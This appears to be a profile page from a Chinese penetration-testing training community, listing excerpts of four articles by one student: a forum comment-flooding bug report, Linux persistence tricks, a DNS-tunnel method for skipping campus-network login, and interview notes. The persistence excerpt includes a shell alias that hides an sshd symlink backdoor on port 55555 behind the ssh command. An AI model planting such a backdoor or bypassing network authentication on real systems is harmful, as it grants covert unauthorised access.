Track 正式学员

我很低调

5关注
2粉丝
4文章
返回网站首页

您已发布 4篇文章作品写文章

社区存在评论灌水漏洞

1.1社区存在评论灌水1.1.1漏洞地址https://bbs.zkaq.cn/t/*.html1.1.2漏洞分析抓重复放包可以重复回复第一个人,同时这个pid也可以修改,对其他用户进行回复1.1.3风险分析造成其他用户的体验感下降1.1.4风险等级未知1.1.5安全建议回复部分添加验证码

 2023-10-12
 0 
 565 

权限控制组合拳

今天讲的是linux权限控制的手法,总结了下大概有以下这些:最近也在总结这些方法,就想着是否可以将其中的控制手法组合起来形成一个新的手法呢?说干就干alias + 软链接:alias ssh='rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh'我们写到环境变量中,有六种环境变

 2023-6-18
 0 
 570 

DNS隧道+ew代理绕过校园网验证

前言:校园网肯定都用过,但是你是否想过,是否可以破解校园网,从而让我们免费上网呢?我们思考一件事情,为什么我们没有登录会自动条状到验证界面的呢?我们可以解析其网址呢?这就是因为校园网没有阻断53端口准备:一台公网服务器、DNS穿透工具iodined、代理软件ew、windwos代理工具proxfier、tap虚拟网卡操作:1、验证连接到校园网主机没有登录,是否能够进行DNS解析nslooku

 2023-6-15
 2 
 824 

几次面试总结

第一次面试:面试中要求会网络先关的知识第二次面试:一面的时候因为没有提前准备,很紧张,意想不到的是给我二面的机会。还好我在二面过后好好总结了下面试的话提前准备开场白:你好面试官,我叫胡嘉伟,大三在读学生。本人刻苦勤奋,工作踏实,善于学习。鉴于当前的国际形势,网络安全就是国家安全。我在学习好本专业软件工程的同时,涉足了渗透测试工程师的培训,通过三个月的web渗透学习,已经具备了基本的渗透测试能

 2023-3-16
 0 
 1123